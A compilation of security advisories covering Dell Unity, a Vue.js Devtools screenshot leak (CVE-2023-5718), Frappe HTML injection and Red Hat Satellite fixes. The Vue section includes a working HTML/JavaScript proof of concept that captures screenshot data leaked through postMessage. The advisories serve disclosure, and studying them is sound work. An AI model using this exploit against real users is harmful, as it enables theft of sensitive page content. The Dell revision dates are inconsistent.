CVE-2021-4149, CVE-2021-4197, CVE-2021-4202, CVE-2022-0322, CVE-2022-0330, CVE-2022-0435, CVE-2021-44879, CVE-2022-0001, CVE-2022-0002, CVE-2022-0487, CVE-2022-0492, CVE-2022-0617, CVE-2022-0644, CVE-2022-24448, CVE-2022-24959

https://www.suse.com/security/cve/CVE-2021-4149.html, https://www.suse.com/security/cve/CVE-2021-4197.html, https://www.suse.com/security/cve/CVE-2021-4202.html, https://www.suse.com/security/cve/CVE-2022-0322.html, https://www.suse.com/security/cve/CVE-2022-0330.html, https://www.suse.com/security/cve/CVE-2022-0435.html, https://www.suse.com/security/cve/CVE-2021-44879.html, https://www.suse.com/security/cve/CVE-2022-0001.html, https://www.suse.com/security/cve/CVE-2022-0002.html, https://www.suse.com/security/cve/CVE-2022-0487.html, https://www.suse.com/security/cve/CVE-2022-0492.html, https://www.suse.com/security/cve/CVE-2022-0617.html, https://www.suse.com/security/cve/CVE-2022-0644.html, https://www.suse.com/security/cve/CVE-2022-24448.html, https://www.suse.com/security/cve/CVE-2022-24959.html

libcroco

CVE-2020-12825

https://www.suse.com/security/cve/CVE-2020-12825.html

postgresql12

CVE-2021-23222, CVE-2021-23214

https://www.suse.com/security/cve/CVE-2021-23222.html, https://www.suse.com/security/cve/CVE-2021-23214.html

git

CVE-2021-40330

https://www.suse.com/security/cve/CVE-2021-40330.html

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

   

Product

Affected Versions

Remediated Versions

Link

Dell Unity Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers 

Dell UnityVSA Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

Dell Unity XT Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

   

Product

Affected Versions

Remediated Versions

Link

Dell Unity Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers 

Dell UnityVSA Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

Dell Unity XT Operating Environment (OE)

Versions prior to 5.3.0.0.5.120

Version 5.3.0.0.5.120

https://www.dell.com/support/home/product-support/product/unity-all-flash-family/drivers

**Revision History**

Revision

Date

Description

1.0

2023-05-08

Initial Release

2.0

2023-09-01

Updated for enhanced presentation with no changes to content.

3.0

2023-01-23

Added 4 new CVEs, CVE-2023-43074, CVE-2023-43065, CVE-2023-43066, CVE-2023-43067 under "PROPRIERTARY CODE" section 

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Dell EMC Unity, Dell Unity 300, Dell EMC Unity 300F, Dell EMC Unity 350F, Dell EMC Unity 400, Dell EMC Unity 400F, Dell Unity Operating Environment (OE), Dell EMC UnityVSA (Virtual Storage Appliance) , Dell EMC UnityVSA Professional Edition/Unity Cloud Edition ...

CVE-2023-43074: DSA-2023-141: Dell Unity, Unity VSA and Unity XT Security Update for Multiple Vulnerability

The Vue.js Devtools extension was found to leak screenshot data back to a malicious web page via the standard `postMessage()` API. By creating a malicious web page with an iFrame targeting a sensitive resource (i.e. a locally accessible file or sensitive website), and registering a listener on the web page, the extension sent messages back to the listener, containing the base64 encoded screenshot data of the sensitive resource.

**Disclosure Status**

I have disclosed this to the maintainer, who issued a fix (by disabling the screenshot functionality by default) in version 6.5.1

**Commits**

https://github.com/vuejs/devtools/releases/tag/v6.5.1

https://github.com/vuejs/devtools/commit/3444bdd8

**Technical Details:**

The Vue.js Devtools extension was found to leak screenshot data back to a malicious web page via the standard postMessage() API. By creating a malicious web page with an iFrame targeting a sensitive resource (i.e. a locally accessible file or sensitive website), and registering a listener on the web page, the extension sent messages back to the listener, containing the base64 encoded screenshot data of the sensitive resource.

Some user interaction was required, as the messages containing screenshot data were only sent when the victim hovered over the timeline bars in the timeline tab (see below)

Some mitigations exist in terms of the website that can be targeted by the malicious web page, as the target site must allow being embedded within iFrames (i.e. the X-Frame-Options HTTP response header must not be present or must explicitly allow the target site). However, it was found that other tabs with the Vue.js devtools extension active also leaked screenshot data back to the malicious web page, increasing the chance of sensitive information disclosure.

The code below shows how the extension uses a wildcard in the postMessage() function call (\*) to send the messages back to the web page listeners, which is why screenshot data from separate tabs can be leaked.

const bridge \= new Bridge({
  listen (fn) {
    window.addEventListener('message', evt \=> fn(evt.data))
  },
  send (data) {
    if (process.env.NODE\_ENV !== 'production') {
      console.log('%cbackend -> devtools', 'color:#888;', data)
    }
    window.parent.postMessage(data, '\*')
  },
})

**PoC**

In the proof-of-concept Vue.js application below, the standard window.addEventListener(‘message’ <listener>) API is used to register a listener on the malicious web page. The setInterval() function is used to regularly simulate clicks on the PoC page, as these (mouse, keyboard etc) events are what trigger the page capture APIs to generate screenshot data. The handleScreenshot() function checks each incoming message for the expected parameters and converts the incoming base64 encoded screenshot data into an image, which is embedded into the PoC page. In reality, the base64 data would probably be silently exfiltrated to a malicious backend server.

<!DOCTYPE html\>
<html lang\="en"\>
<head\>
    <meta charset\="UTF-8"\>
    <title\>postMessage() PoC</title\>
    <script src\="https://unpkg.com/vue@3/dist/vue.global.js"\></script\>
</head\>
<body\>
    <div id\="app"\>
        <iframe src\="https://www.wikipedia.org" style\="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden;"\></iframe\>
    </div\>
    <script\>
        const { createApp, ref } \= Vue

        createApp({
            setup() {
                const message \= ref('Hello vue!')
                return {
                    message
                }
            }
        }).mount('#app')
    </script\>

    <script\>
        function dummyClick() {
            console.log('Simulating click on PoC page..')
            document.body.click();
        }

        function listenForMsg() {
            window.addEventListener("message", (msg) \=> {
                console.log(\`Got message in PoC page (window.addEventListener): ${JSON.stringify(msg.data)}\`);
                handleScreenshot(msg.data);
            });
            console.log(\`Added message listener (window.addEventListener)..\`);
        }

        function handleScreenshot(data) {
            if (data.payload && data.payload.length \> 0) {
                data.payload.forEach((event) \=> {
                    if (event.event \=== 'b:timeline:show-screenshot' && event.payload.screenshot) {
                        console.log(\`Got screenshot with id: ${event.payload.screenshot.id}\`);
                        let img \= new Image();
                        img.src \= event.payload.screenshot.image;
                        document.body.append(img);
                    }
                }, null);
            }
        }

        listenForMsg();
        setInterval(dummyClick, 1500);
    </script\>
</body\>
</html\>

CVE-2023-5718: Vuejs Dev Tools v6.5.0 Sensitive Information Leaked to Malicious Web Page

Frappe is a full-stack web application framework that uses Python and MariaDB on the server side and an integrated client side library. A malicious Frappe user with desk access could create documents containing HTML payloads allowing HTML Injection. This vulnerability has been patched in version 14.49.0.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-46127: refactor: escape instead of sanitizing HTML by ankush · Pull Request #22339 · frappe/frappe

Red Hat Security Advisory 2023-5980-01 - Updated Satellite 6.11 packages that fix several bugs are now available for Red Hat Satellite. Issues addressed include code execution and denial of service vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5980.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Satellite 6.11.5.6 async security update  
Advisory ID:        RHSA-2023:5980-01  
Product:            Red Hat Satellite 6  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5980  
Issue date:         2023-10-20  
Revision:           01  
CVE Names:          CVE-2022-1292  
====================================================================

Summary: 

Updated Satellite 6.11 packages that fix several bugs are now available for Red Hat Satellite.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments.

Security fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset) (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset) (CVE-2023-44487)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaws is available in the References section.

* ruby-git: code injection vulnerability (CVE-2022-46648)

* ruby-git: code injection vulnerability (CVE-2022-47318)

* Foreman: Arbitrary code execution through templates (CVE-2023-0118)

* Satellite/Foreman: Arbitrary code execution through yaml global parameters (CVE-2023-0462)

* openssl: c_rehash script allows command injection (CVE-2022-1292)

* openssl: the c_rehash script allows command injection (CVE-2022-2068)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

This update fixes the following bugs:

2159417 - CVE-2023-0118 foreman: Arbitrary code execution through templates [rhn_satellite_6.11]  
2163523 - CVE-2023-0462 foreman: Satellite/Foreman: Arbitrary code execution through yaml global parameters [rhn_satellite_6.11]  
2242355 - CVE-2022-1292 CVE-2022-2068 puppet-agent for Satellite and Capsule: various flaws [rhn_satellite_6.11]  
2242360 - CVE-2022-47318 tfm-rubygem-git: ruby-git: code injection vulnerability [rhn_satellite_6.11]  
2242364 - CVE-2022-46648 rubygem-git: ruby-git: code injection vulnerability [rhn_satellite_6.11]  
2243832 - [Major Incident] CVE-2023-39325 CVE-2023-44487 yggdrasil-worker-forwarder: various flaws [rhn_satellite_6.11] 

Users of Red Hat Satellite are advised to upgrade to these updated packages,  
which fix these bugs.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-1292

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://access.redhat.com/documentation/en-us/red_hat_satellite/6.11/html-single/upgrading_and_updating_red_hat_satellite/index#updating_satellite

Tag

#git